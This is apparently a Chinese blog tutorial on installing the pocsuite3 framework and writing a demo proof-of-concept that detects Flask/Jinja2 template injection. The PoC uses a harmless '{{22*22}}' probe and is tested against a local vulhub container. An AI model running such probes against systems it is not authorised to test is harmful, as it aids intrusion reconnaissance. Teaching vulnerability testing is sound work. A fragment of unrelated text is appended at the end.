poc
知道创宇的pocsuite3更新了。
https://github.com/knownsec/pocsuite3
一、安装
安装p'ython3.4以上
pip3 install pocsuite3
安装完成后 控制台输入pocsuite,如下结果就是安装成功了
二、poc测试
写一个很简单的poc测试flask的ssti漏洞
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urljoin
class DemoPOC(POCBase):
vulID = '111'
version = '3.0'
author = ['liao']
vulDate = '2017-12-14'
createDate = '2017-12-14'
updateDate = '2017-12-14'
references = ['https://github.com/vulhub/vulhub/tree/master/flask/ssti']
name = 'Flask(Jinja2) SSTI'
APPPowerLink = ''
appName = 'flask'
appVersion = '1.x'
vulType = 'SSTI'
desc = '''
flask服务器模板注入漏洞
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
path = "/?name="
url = urljoin(self.url, path)
payload = "{{22*22}}"
resp = requests.get(url + payload)
try:
if resp and resp.status_code == 200 and "484" in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Name'] = payload
except Exception as e:
pass
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
register_poc(DemoPOC)
三、本地搭建漏洞环境测试
使用docker搭建flask测试环境
https://github.com/vulhub/vulhub/tree/master/flask/ssti
四、run poc
直接命令行跑poc
这个只是很简单的demo ,pocsuite3很强大,更多可以参考pocsuite3的文档
相关阅读
超额十倍完成目标,不可谓不火爆,那么这款小电脑的真正表现究竟如何呢?鉴于该机还未正式上市,因此媒体评论还都是基于相似配置的Win 10